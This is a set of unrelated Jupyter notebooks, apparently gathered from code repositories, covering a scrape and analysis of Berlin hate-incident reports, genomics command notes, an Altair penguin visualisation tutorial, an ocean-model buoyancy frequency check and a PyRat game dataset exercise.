'Neukölln'][df_2014_2021_lgbt_attacks['Date'] == '2020-04-12']['Story'].iloc[0]", "<ipython-input-614-241ff01241a7>:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'] == 'Neukölln'][df_2014_2021_lgbt_attacks['Date'] == '2020-04-12']['Story'].iloc[0]\n" ] ], [ [ "## Check for references to Turks or Arabs", "_____no_output_____" ] ], [ [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['Story'].str.contains('arab|turk') == True]['Date']", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['Date'].dt.year == 2018]", "_____no_output_____" ], [ "df_2014_2021.loc[10294]['Story']", "_____no_output_____" ] ], [ [ "### Detect languages and find missing stories in df_complete", "_____no_output_____" ], [ "All stories in German. Some include text in English too.", "_____no_output_____" ] ], [ [ "list(df_complete['Story']", "_____no_output_____" ], [ "stories = list(df_complete['Story'])\nlanguages_stories = []\nmissing_stories = [] # index of missing stories in LIST stories\nfor i, story in enumerate(stories):\n try:\n lan = detect(story)\n except:\n lan = np.nan\n missing_stories.append(i)\n languages_stories.append(lan)", "_____no_output_____" ], [ "set(languages_stories)", "_____no_output_____" ], [ "# indices of stories in en, nl and missing \nindices_en = [i for i, x in enumerate(languages_stories) if x == \"en\"]\nindices_nl = [i for i, x in enumerate(languages_stories) if x == \"nl\"]\nindices_nan = [i for i, x in enumerate(languages_stories) if type(x) != str]", "_____no_output_____" ] ], [ [ "---", "_____no_output_____" ], [ "## Scrape data", "_____no_output_____" ] ], [ [ "def scrape_links():\n '''\n Scrapes links of all the cases registered \n '''\n years = [x for x in range(2007, 2022)]\n links_cases = []\n titles_cases = []\n for year in years:\n path = 
f'https://berliner-register.de/chronik?field_datum_value%5Bvalue%5D%5Byear%5D={year}'\n response = requests.get(path)\n chronik_list_html = response.text\n chronik_list_soup = BeautifulSoup(chronik_list_html)#, features=\"lxml\")\n html_links = chronik_list_soup.find_all(attrs={'class': 'views-field views-field-title'})\n for i in html_links:\n str_entry = str(i.find_all('a')[0])\n path_end, case_title = re.findall('(\\/.+)\">(.+)<', str_entry)[0]\n path = 'https://berliner-register.de' + path_end\n links_cases.append(path)\n titles_cases.append(case_title)\n return links_cases", "_____no_output_____" ], [ "# pickled links_cases: list of all links\nwith open('links_cases.pickle', 'wb') as f:\n pickle.dump(links_cases, f)", "_____no_output_____" ], [ "def make_cases_dict():\n cases_dict = {'Date': [], 'District': [], 'Header': [], 'Story': [], 'Source': [], 'ID': [], 'Link': []}\n for path in links_cases:\n try:\n case_id = int(re.findall('\\d+$', path)[0])\n except:\n case_id = np.nan\n response = requests.get(path)\n case_html = response.text\n case_soup = BeautifulSoup(case_html).find(attrs={'id': 'main'})\n case_title = case_soup.h1.text\n try:\n case_description_soup = case_soup.find_all('p')\n # makes sure all paragraphs are extracted\n case_description_list = [x.text for x in case_description_soup]\n case_description = '\\n'.join(case_description_list)\n except:\n case_description = np.nan\n try:\n case_bezirk = case_soup.find(attrs={\n 'class': \"field field-name-field-register-vorfall field-type-taxonomy-term-reference field-label-inline clearfix\"}).find(attrs={\n 'class': 'field-item even'\n }).text\n except:\n case_bezirk = np.nan\n try:\n case_date = case_soup.find(attrs={\n 'class': 'field field-name-field-datum field-type-datetime field-label-inline clearfix'\n }).find(attrs={'class': 'field-item even'}).text\n except:\n case_date = np.nan\n try:\n case_source = case_soup.find(attrs={\n 'class': 'field field-name-field-quelle field-type-text 
field-label-inline clearfix'\n }).find(attrs={'class': 'field-item even'}).text\n except:\n case_source = np.nan\n\n cases_dict['Link'].append(path)\n cases_dict['ID'].append(case_id)\n cases_dict['Date'].append(case_date)\n cases_dict['District'].append(case_bezirk)\n cases_dict['Header'].append(case_title)\n cases_dict['Story'].append(case_description)\n cases_dict['Source'].append(case_source)\n\n return cases_dict", "_____no_output_____" ], [ "# pickle cases_dict: dictionary that leads to dataframe\nwith open('cases_dict.pickle', 'wb') as f:\n pickle.dump(cases_dict, f)", "_____no_output_____" ] ], [ [ "#### Make dataframe", "_____no_output_____" ] ], [ [ "df_complete = pd.DataFrame(cases_dict)\ndf_complete['Date'] = pd.to_datetime(df_complete['Date']) # parse dates", "_____no_output_____" ], [ "# pickle df_complete\nwith open('df_complete.pickle', 'wb') as f:\n pickle.dump(df_complete, f)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e73119ce6b1023850fa9f5ddd0685990cc132480
2,105
ipynb
Jupyter Notebook
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
notebook/.ipynb_checkpoints/history-checkpoint.ipynb
isabelleberger/isabelle-
d1337814fac73e7e6d516d1fb5e118a5dd6aeced
[ "MIT" ]
null
null
null
27.337662
141
0.6038
[ [ [ "Commands so far:\n\n-convert fimo to bed using fimo2bed.py (input is motif_alignments_flyFactor_dm6.2L.txt, output adds a \"._bed\" to end of file name)\n-slop gives gene_only_slop: bedtools slop: \n bedtools slop -i dmel-all-r6.12.gene_only.chr.gff -g ChromInfo.txt -l 1000 -r 0 -s\n-bedtools intersect -a motif_alignments_flyFactor_dm6.2L_BED.bed -b dmelr6.12.gene_only_slop.txt -wb > bedtoolsintersect_out.txt\n-phastcons steps: \n * wig2bed < dm6.27way.phastCons.wigFix > dm6_phastcons.bed\n * grep \"chr2L\" dm6_phastcons.bed > small.bed\n * bedtools intersect -a bedtoolsintersect_out.txt -b small.bed -wo > dm6_phastcons_intersect.txt\n * python phastcons_table.py --input /Users/bergeric/data/dm6_phastcons_intersect.txt --output practiceoutfile.txt\n ", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e7311c82ccfd13f5bdd18ac14184d327033355bd
361,217
ipynb
Jupyter Notebook
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
art of data/topics/data viz/archive/altair_cont.ipynb
lee-edu/materials
529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22
[ "MIT" ]
null
null
null
887.511057
69,813
0.576728
[ [ [ "# Altair Continued\nWe last looked at the US Employment dataset, and created some starter visualizations. This time, we'll be analyzing and visualizing the [palmerpenguins](https://github.com/allisonhorst/palmerpenguins) dataset, which is a great starter dataset! More information can be found by following the link (including images of cute penguins.)\n\n## Palmer Penguins\nYou will have to run `pip3 install palmerpenguins` in order to have access to the dataset. If you are using Google Colab, you can simply run the following code cell.", "_____no_output_____" ] ], [ [ "#!pip install palmerpenguins", "_____no_output_____" ], [ "import altair as alt\nfrom palmerpenguins import load_penguins\n\npenguins = load_penguins()\npenguins.sample(5)", "_____no_output_____" ] ], [ [ "## Data Exploration\nUsing the methods from the previous worksheet, answer the following questions about the palmerpenguins dataset.\n\n### Question 1: Which species of penguins are represented in this dataset?", "_____no_output_____" ] ], [ [ "# Write your answer to question 1 here", "_____no_output_____" ] ], [ [ "### Question 2: On average, which species of penguin has the longest beak?", "_____no_output_____" ] ], [ [ "# Write your answer to question 2 here", "_____no_output_____" ] ], [ [ "### Question 3: Describe the relationship between flipper length and bill length.", "_____no_output_____" ] ], [ [ "# Write your answer to question 3 here", "_____no_output_____" ] ], [ [ "### Question 4: Create a scatterplot for flipper length vs bill length. 
Each species should be a different color.", "_____no_output_____" ] ], [ [ "# Write your answer to question 4 here", "_____no_output_____" ] ], [ [ "### Question 5: Compare and describe the distribution of flipper lengths across the different species.", "_____no_output_____" ] ], [ [ "# Write your answer to question 5 here", "_____no_output_____" ] ], [ [ "## More Altair!\nLet's start off by visualizing the relationship between bill length and bill depth. Notice the use of `.interactive()` after we've defined the marks and channels. This allows the user to scroll and pan through the visualization -- since this is such a common request, Altair provides it by default!", "_____no_output_____" ] ], [ [ "alt.Chart(penguins).mark_point().encode(\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\"\n).interactive()", "_____no_output_____" ], [ "# Now let's color-code the species\nspecies_color = alt.Color(\"species:N\") # We can extract this out into a separate variable\n\nalt.Chart(penguins).mark_point().encode(\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\",\n color=species_color\n).interactive()", "_____no_output_____" ], [ "# Now to create our own legend (this will come in handy soon!)\nspecies_color = alt.Color(\"species:N\", legend=None) # Remove the default legend\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode( # Notice we create a new Chart variable\n x=\"bill_length_mm:Q\",\n y=\"bill_depth_mm:Q\",\n color=species_color\n).interactive()\n\nlegend = alt.Chart(penguins).mark_rect().encode( # We also create a legend variable (it's a mini viz)\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color # Reusing the species_color variable -- this is why we created it!\n)\n\nbills | legend # It's this easy to mash visualizations together", "_____no_output_____" ] ], [ [ "## Other Interactions\nWhat if you want to do more than just panning and zooming? 
Then you'll need to understand how Altair represents interactions. More information can be found [at the documentation here](https://altair-viz.github.io/user_guide/interactions.html). The next few examples are based on the documentation.\n\n### Selections and Conditions\nYou must first identify a `selection`; this allows a viewer to interact with and select specific parts of your visualization.\n\nThen, you have to identify a `condition` that changes depending on what is being selected.\n\n### A Simple Example\nHere's an example of a rectangular selection -- the user is allowed to click and drag on the graph (the `selection`), and the color of the dots will change depending on whether or not it is inside the selection (the `condition`).", "_____no_output_____" ] ], [ [ "selection = alt.selection_interval() # Use a rectangular selection\n\nspecies_color = alt.condition(selection, # Set the color to change depending on a the selection\n alt.Color(\"species:N\", legend=None),\n alt.value(\"lightgray\"))\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode(\n x=alt.X(\"bill_length_mm:Q\", scale=alt.Scale(zero=False)),\n y=alt.Y(\"bill_depth_mm:Q\", scale=alt.Scale(zero=False)),\n color=species_color\n).add_selection( # We have to tell the chart to use the selection we've defined\n selection\n)\n\n# Create corresponding legend for species\nlegend = alt.Chart(penguins).mark_rect().encode(\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color\n)\n\nbills | legend", "_____no_output_____" ] ], [ [ "### A More Complicated Example\nWhat if you wanted to allow the viewer to click on a species to see all the corresponding points? 
Examine the code below while thinking about what the *selection* and *condition* are.", "_____no_output_____" ] ], [ [ "selection = alt.selection_multi(fields=['species']) # A different kind of selection!\n\nspecies_color = alt.condition(selection, # Set the color to change depending on a the selection\n alt.Color(\"species:N\", legend=None),\n alt.value(\"lightgray\"))\n\n# Create scatterplot of bill length vs bill depth\nbills = alt.Chart(penguins).mark_point().encode(\n x=alt.X(\"bill_length_mm:Q\", scale=alt.Scale(zero=False)),\n y=alt.Y(\"bill_depth_mm:Q\", scale=alt.Scale(zero=False)),\n color=species_color\n).interactive()\n\n# Create corresponding legend for species\nlegend = alt.Chart(penguins).mark_rect().encode(\n y=alt.Y(\"species:N\", axis=alt.Axis(orient=\"right\")),\n color=species_color\n).add_selection(selection) # We now add it to the legend instead, since that is what the viewer interacts with\n\nbills | legend", "_____no_output_____" ] ], [ [ "## Your Turn to Practice\nLook through the above examples and documentation! **Make sure you read carefully through my code!** These will be good references.\n\n### Practice 1: Visualize the relationship between flipper length and body mass. Allow the user to filter by species.", "_____no_output_____" ] ], [ [ "# Write your code for Practice 1 here.", "_____no_output_____" ] ], [ [ "### Practice 2: Visualize the relationship between island and body mass. Choose appropriate marks, channels, and interactions!", "_____no_output_____" ] ], [ [ "# Write your code for Practice 2 here.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e7311f374997f270c36074854b0a9ee22e1bcaf6
444,801
ipynb
Jupyter Notebook
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
analysis/Testing Buoyancy Frequency.ipynb
SalishSeaCast/2d-domain
4dc2a427bda00230fa629c89563cfbd9cd7dde84
[ "Apache-2.0" ]
null
null
null
995.080537
257,250
0.943035
[ [ [ "A notebook to test the calculation of the buuoyancy frequency as implemented in froude.py.", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\nimport netCDF4 as nc\nimport froude\nimport os\nimport numpy as np\nimport datetime\n\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Load some data to experiment with", "_____no_output_____" ] ], [ [ "path = '/data/nsoontie/MEOPAR/SalishSea/results/2Ddomain/3.6'\ndirectory = 'base_aug'\nfile_part = 'SalishSea_1d_20030819_20030927_{}.nc'\n\ndT = nc.Dataset(os.path.join(path,directory,file_part.format('grid_T')))\nsal = dT.variables['vosaline'][:]\nsal = np.ma.masked_values(sal,0)\ndeps = dT.variables['deptht'][:]\ntemp = dT.variables['votemper'][:]\ntemp = np.ma.masked_values(temp,0)\nssh = dT.variables['sossheig'][:]\nn2 = dT.variables['buoy_n2'][:]\nn2 = np.ma.masked_values(n2,0)\ntimes = dT.variables['time_counter'][:]\ntime_origin = datetime.datetime.strptime(dT.variables['time_counter'].time_origin, '%Y-%m-%d %H:%M:%S')\n\ndU = nc.Dataset(os.path.join(path,directory,file_part.format('grid_U')))\nU = dU.variables['vozocrtx'][:]\nU = np.ma.masked_values(U,0)\ndepsU=dU.variables['depthu'][:]\n\ndW = nc.Dataset(os.path.join(path,directory,file_part.format('grid_W')))\navt = dW.variables['vert_eddy_diff'][:]\navt = np.ma.masked_values(avt,0)\navm = dW.variables['vert_eddy_visc'][:]\navm = np.ma.masked_values(avm,0)\ndepsW=dW.variables['depthw'][:]\ndiss = dW.variables['dissipation'][:]\ndiss = np.ma.masked_values(diss,0)\n\n\n", "_____no_output_____" ] ], [ [ "Load the mesh_mask file for scale factors", "_____no_output_____" ] ], [ [ "mesh = nc.Dataset('/data/nsoontie/MEOPAR/2Ddomain/grid/mesh_mask.nc')\n\ne3w = mesh.variables['e3w'][0,:,:,:] # NEMO uses e3w.", "_____no_output_____" ], [ "rho = froude.calculate_density(temp, sal)", "_____no_output_____" ] ], [ [ "Calculate buoyancy frequency with froude module", "_____no_output_____" ] ], [ [ "reload(froude)", "_____no_output_____" ], [ "n2_f = 
froude.calculate_buoyancy_frequency(temp, sal, e3w, 1)\nn2_f = np.ma.masked_values(n2_f,0)", "_____no_output_____" ] ], [ [ "Plot n2_f to see that it makes sense. ", "_____no_output_____" ] ], [ [ "yslice=5\nfig, axs = plt.subplots(8,5,figsize=(20,10))\nfor t, ax in zip (np.arange(times.shape[0]), axs.flat):\n ax.pcolor(np.arange(n2_f.shape[-1]),deps,n2_f[t,:,yslice,:],vmin=-0.01,vmax = 0.01)\n ax.set_title(t)\n ax.set_ylim([400,0])", "_____no_output_____" ] ], [ [ "Compare with NEMO's buoyancy frequency.", "_____no_output_____" ] ], [ [ "diff = n2-n2_f;\n\nprint np.ma.max(diff)\nprint np.ma.min(diff)\nprint np.ma.mean(diff)", "0.0637975778828\n-0.0582721825923\n-9.82715828842e-05\n" ], [ "ind = np.unravel_index(np.ma.argmax(diff), diff.shape)\nind", "_____no_output_____" ], [ "for t in np.arange(times.shape[0]):\n max = np.ma.max(diff[t,...])\n ind = np.unravel_index(np.ma.argmax(diff[t,...]), diff[t,:,:,:].shape)\n print t, ind, max", "0 (4, 4, 1098) 0.0637975778828\n1 (4, 4, 1098) 0.0608109813299\n2 (4, 3, 1098) 0.0397740351603\n3 (4, 6, 1098) 0.0209874000337\n4 (5, 4, 1098) 0.00988855767693\n5 (5, 3, 1098) 0.00900880743467\n6 (5, 2, 1098) 0.00978058835956\n7 (9, 7, 1098) 0.0110632234048\n8 (9, 7, 1098) 0.0124031425429\n9 (9, 6, 1098) 0.012225554126\n10 (9, 7, 1098) 0.0116716421533\n11 (9, 7, 1098) 0.0125277705359\n12 (9, 2, 1098) 0.0118110675493\n13 (9, 6, 1098) 0.0117886870289\n14 (9, 3, 1098) 0.0107564743981\n15 (5, 7, 1098) 0.0112179594198\n16 (5, 3, 1098) 0.0144991979914\n17 (9, 3, 1098) 0.00875587577357\n18 (9, 3, 1098) 0.0106275686009\n19 (9, 4, 1098) 0.012333180511\n20 (9, 7, 1098) 0.0118250392402\n21 (9, 4, 1098) 0.0129439677513\n22 (9, 7, 1098) 0.0125979529458\n23 (9, 6, 1098) 0.0126424818841\n24 (9, 3, 1098) 0.0113636432119\n25 (9, 6, 1098) 0.0125236500263\n26 (9, 6, 1098) 0.0125499353037\n27 (9, 2, 1098) 0.0117528877319\n28 (9, 4, 1098) 0.011401231538\n29 (9, 5, 1098) 0.0112679367465\n30 (9, 5, 1098) 0.0102891201313\n31 (9, 2, 1098) 
0.0100897596802\n32 (9, 6, 1098) 0.0113250296708\n33 (9, 7, 1098) 0.0126732391574\n34 (9, 6, 1098) 0.0116363472431\n35 (9, 5, 1098) 0.0126982071884\n36 (5, 4, 1098) 0.011294103198\n37 (9, 5, 1098) 0.0124413324398\n38 (9, 3, 1098) 0.0122079726973\n39 (4, 2, 1098) 0.0138501868888\n" ] ], [ [ "I think the major differences have to do with the vertical stretching of the grid due to vvl. This is largest at the right side of the domain. I'm not particularly interated in the buoyany frequency in that location, so can I neglec this? Probably. \n\nWhat do the differences look like elsewhere?", "_____no_output_____" ] ], [ [ "yslice=5\nfig, axs = plt.subplots(8,5,figsize=(20,10))\nfor t, ax in zip (np.arange(times.shape[0]), axs.flat):\n ax.pcolor(diff[t,:,yslice,:],vmin=-0.01,vmax = 0.01)\n ax.set_title(t)\n ax.set_ylim([40,0])", "_____no_output_____" ] ], [ [ "How do these differences affect my Froude number calculations?", "_____no_output_____" ] ], [ [ "n2_f_slice= n2_f[:,:,yslice,:]\nrho_slice = rho[:,:,yslice,:]\nu_slice = U[:,:,yslice,:]\n\nn2_slice= n2[:,:,yslice,:]\n\n\nFr_mys, cs, uvgs, dates = froude.froude_time_series(n2_f_slice,rho_slice,u_slice,\n deps,depsU,times, time_origin)\nFr_NEMO, cs, uvgs, dates = froude.froude_time_series(n2_slice,rho_slice,u_slice,\n deps,depsU,times, time_origin)", "/home/nsoontie/anaconda/lib/python2.7/site-packages/numpy/ma/core.py:3900: UserWarning: Warning: converting a masked element to nan.\n warnings.warn(\"Warning: converting a masked element to nan.\")\n" ], [ "xmin = 300; xmax=700\nfig,axs = plt.subplots(2,1,figsize=(10,5),sharex=True)\nax=axs[0]\nax.plot(dates,Fr_mys, label = 'with my N2')\nax.plot(dates,Fr_NEMO, label = 'with NEMOs n2')\nax.set_ylabel('Froude number')\nax.set_title('Average Froude number in region xind = {} -{}'.format(xmin,xmax))\nax.set_ylim([0,2.5])\nax.grid()\nax.legend(loc=0)\nax=axs[1]\nax.plot(dates,np.array(Fr_mys)-np.array(Fr_NEMO))\nax.set_ylabel('Difference')\nax.set_title('Difference, 
mine-NEMO')\nax.set_ylim([-.05,.05])\nax.grid()", "_____no_output_____" ] ], [ [ "Differences are so small that I'm not going to worry about it. I'm interested in Froude numbers around 1. Calculating buoyancy frequency my own way doens't affect the results to the precision I need. But in the future, I should output n2 as part of the simulation. ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e731255c20d57d4cbb8ef0acacee1e713e6eaf44
2,172
ipynb
Jupyter Notebook
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
30.591549
117
0.596225
[ [ [ "# Face detection - done for single and multiple faces\r\nimport cv2\r\n\r\n# read the image using imread\r\nfaces_image = cv2.imread(\"./faces.png\")\r\n\r\n# cascade classifier reads the xml input where face features are stored\r\nface_identifier = cv2.CascadeClassifier(\"../../haarcascade_frontalface_default.xml\")\r\n\r\n# convert the image to a gray scale image using cv2 functions\r\ngray_image = cv2.cvtColor(faces_image, cv2.COLOR_BGR2GRAY)\r\n\r\n# the shape of gray image will be 2D\r\ngray_image.shape\r\n\r\n# using the face features learnt use detect multi scale function to detect faces in the image\r\n# scalefactor - Parameter specifying how much the image size is reduced at each image scale\r\n# minNeighbors - Parameter specifying how many neighbors each candidate rectangle should have to retain it\r\nface = face_identifier.detectMultiScale(gray_image, 1.1, 4)\r\n\r\n# draws a rectangle around the face\r\n# thickness of the line is 2 here\r\nfor x, y, w, h in face:\r\n cv2.rectangle(faces_image, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n# displaying the image\r\ncv2.imshow(\"face detection\", faces_image)\r\n\r\n# captures a single frame and waits till any key is pressed to exit\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code" ] ]
e7312e2af257d729baedd0ec10c78c0e3b27a404
283,272
ipynb
Jupyter Notebook
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
250.461538
98,922
0.904608
[ [ [ "Introduction to Artificial Intelligence - TP1 - April 11th 2018 \n--\n\nAt the end of this session, you will be able to : \n- Generate PyRat Datasets for a supervised learning setting\n- Perform basic supervised learning tasks using sklearn\n- Apply supervised learning on PyRat datasets ", "_____no_output_____" ] ], [ [ "# The tqdm package is useful to visualize progress with long computations. \n# Install it using pip \nimport tqdm", "_____no_output_____" ] ], [ [ "Part 1 - Generating PyRat datasets\n--\nFirst and foremost you need the latest version of PyRat. To do that, just clone the [official PyRat repository](https://github.com/vgripon/pyrat). \n\nSyntax is \"git clone repo destinationdir\"", "_____no_output_____" ] ], [ [ "### TO DO : open a terminal tab / window and clone the repo.", "_____no_output_____" ] ], [ [ "You can now launch Pyrat Games. \n\nIn the context of the AI course, we are going to simplify the rules of PyRat a bit.\nIn fact, we are going to remove all walls and mud penalties. Also, we are not going to consider symmetric mazes anymore.\n\nAs such, a default game would be obtained with the following parameters:\n<pre>python3 pyrat.py -p 40 -md 0 -d 0 --nonsymmetric</pre>\n\nIn the supervised and unsupervised projects, we are going to obtain data while looking at plays between two greedy algorithms. Generating 1000 such games while saving data is easily obtained with PyRat by using:\n<pre>python3 pyrat.py -p 40 -md 0 -d 0 --nonsymmetric --rat AIs/manh.py --python AIs/manh.py --tests 1000 --nodrawing --synchronous --save</pre>\n\nWe recommend that you open another Terminal to launch this command, because generating 1000 games will take a few minutes, and you won't be able to evaluate any other cell from the jupyter notebook. 
\n\nIt is possible to open a terminal window from the \"Home\" Interface of Jupyter Notebook.\n\nPS: If you don't have pygame installed in your machine you can open a terminal and run\n\n<pre>pip install pygame</pre>\n", "_____no_output_____" ], [ "The 1000 generated games will be in the \"saves\" folder.", "_____no_output_____" ] ], [ [ "### TO DO : open a terminal tab / window and launch the command to generate the games", "_____no_output_____" ] ], [ [ "To convert the games into numpy arrays, we will make use of a few functions that we define here. Feel try to modify it later to your own needs. ", "_____no_output_____" ] ], [ [ "import numpy as np\nimport ast\nimport os\n\nmazeHeight = 15\nmazeWidth = 21\n\ndef convert_input(maze, mazeWidth, mazeHeight, piecesOfCheese):\n im_size = (mazeWidth, mazeHeight) \n canvas = np.zeros(im_size,dtype=np.int8)\n for (x_cheese,y_cheese) in piecesOfCheese:\n canvas[x_cheese,y_cheese] = 1\n # For use with sklearn, we flatten the matrix into an vector\n return canvas.ravel()\n\nPHRASES = {\n \"# Random seed\\n\": \"seed\",\n \"# MazeMap\\n\": \"maze\",\n \"# Pieces of cheese\\n\": \"pieces\" ,\n \"# Rat initial location\\n\": \"rat\" ,\n \"# Python initial location\\n\": \"python\" , \n \"rat_location then python_location then pieces_of_cheese then rat_decision then python_decision\\n\": \"play\"\n}\n \nMOVE_DOWN = 'D'\nMOVE_LEFT = 'L'\nMOVE_RIGHT = 'R'\nMOVE_UP = 'U'\n \ntranslate_action = {\n MOVE_LEFT:0,\n MOVE_RIGHT:1,\n MOVE_UP:2,\n MOVE_DOWN:3\n}\n \ndef process_file(filename):\n f = open(filename,\"r\") \n info = f.readline()\n params = dict(play=list())\n while info is not None:\n if info.startswith(\"{\"):\n params[\"end\"] = ast.literal_eval(info)\n break\n if \"turn \" in info:\n info = info[info.find('rat_location'):]\n if info in PHRASES.keys():\n param = PHRASES[info]\n if param == \"play\":\n rat = ast.literal_eval(f.readline())\n python = ast.literal_eval(f.readline())\n pieces = ast.literal_eval(f.readline())\n 
rat_decision = f.readline().replace(\"\\n\",\"\")\n python_decision = f.readline().replace(\"\\n\",\"\")\n play_dict = dict(\n rat=rat,python=python,piecesOfCheese=pieces,\n rat_decision=rat_decision,python_decision=python_decision)\n params[param].append(play_dict)\n else:\n params[param] = ast.literal_eval(f.readline())\n else:\n print(\"did not understand:\", info)\n break\n info = f.readline()\n return params", "_____no_output_____" ] ], [ [ "Now we are ready to parse the \"saves\" folder in order to generate the data into a numpy array. \n\n**N.b. you don't have to run this cell if you want to just run through the provided correction of TP1, we provide a npz file with a saved dataset**", "_____no_output_____" ] ], [ [ "\ngames = list()\ndirectory = \"saves/\"\nfor root, dirs, files in os.walk(directory):\n for filename in tqdm.tqdm(files):\n try:\n if filename.startswith(\".\"):\n continue\n game_params = process_file(directory+filename)\n games.append(game_params)\n except:\n print(\"Filename {} did not work\".format(filename))\n\nx = np.array([]).reshape(0,mazeWidth * mazeHeight)\ny = np.array([]).reshape(0,1)\nwins_python = 0\nwins_rat = 0\nfor game in tqdm.tqdm(games):\n if game[\"end\"][\"win_python\"] == 1: \n wins_python += 1\n elif game[\"end\"][\"win_rat\"] == 1:\n wins_rat += 1 \n canvas = convert_input(game[\"maze\"], mazeWidth, mazeHeight, game[\"play\"][0][\"piecesOfCheese\"])\n if game[\"end\"][\"win_python\"] == 1:\n y = np.append(y,1)\n elif game[\"end\"][\"win_rat\"] == 1:\n y = np.append(y,-1)\n else:\n y = np.append(y,0)\n x = np.concatenate([x, canvas.reshape(1,-1)], axis=0)", "_____no_output_____" ] ], [ [ "x and y are numpy array, feel free to save them to a .npz file as seen in TP0. 
